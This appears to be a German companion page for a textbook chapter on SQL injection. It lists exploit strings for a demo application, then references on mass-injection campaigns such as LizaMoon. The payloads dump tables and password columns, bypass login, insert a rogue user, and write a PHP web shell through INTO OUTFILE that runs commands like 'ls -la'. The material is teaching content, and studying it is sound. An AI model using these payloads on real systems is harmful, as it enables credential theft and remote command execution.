Kapitel 6 - SQL Injection

6.6 - Die Demo-Anwendung

Die Exploits:

• Alle Einträge ausgeben: id in URL ist
  1 OR 1=1--
• Benutzer-Tabelle ausgeben: id in URL ist
  1 UNION SELECT Benutzer_Name,Real_Name,Passwort,Benutzer_ID FROM benutzer_tabelle;--
• Login unterlaufen: Benutzername oder Passwort ist
  irgendwas' OR 1=1 --
• Neuen Benutzer registrieren: Passwort ist
  ', 1, 1)--
  und
  passwort', 0, 0), ('boese', 'boese', 'boese', 1, 1)--
• PHP-Skript einschleusen: id in URL ist
  1 UNION SELECT 1, 2, '<?php system($_GET[\'cmd\']); ?>', 4 INTO OUTFILE '/var/www/app/shell.php' --
  Danach app/shell.php?cmd= mit Shellbefehl dahinter aufrufen, z.B.
  app/shell.php?cmd=ls -la

Die Links

• [Absinthe] Absinthe
• [Esse_08] Stefan Esser, 18.8.2008; Suspekt: „MySQL and SQL Column Truncation Vulnerabilities“
• [LizaMoon-1] Patrik Runald; WebSense Security Labs Blog: „LizaMoon mass injection hits over 226,000 URLs (was 28,000)“
• [LizaMoon-2] Patrik Runald; WebSense Security Labs Blog: „Update on LizaMoon mass-injection and Q&A“
• [LizaMoon-3] JM Hipolito, TrendLabs Security Intelligence Blog: „LizaMoon, Etc. SQL Injection Attack Still Ongoing“
• [Mini_MySqlat0r] Mini MySqlat0r
• [SQL-Exploit-08] Patrik; F-Secure Labs Blog: „Mass SQL Injection“
• [SQL-Exploit-08-Dekodiert] Bojan Zdrnja; InfoSec Handlers Diary Blog des ISC: „The 10.000 web sites infection mystery solved“

Zurück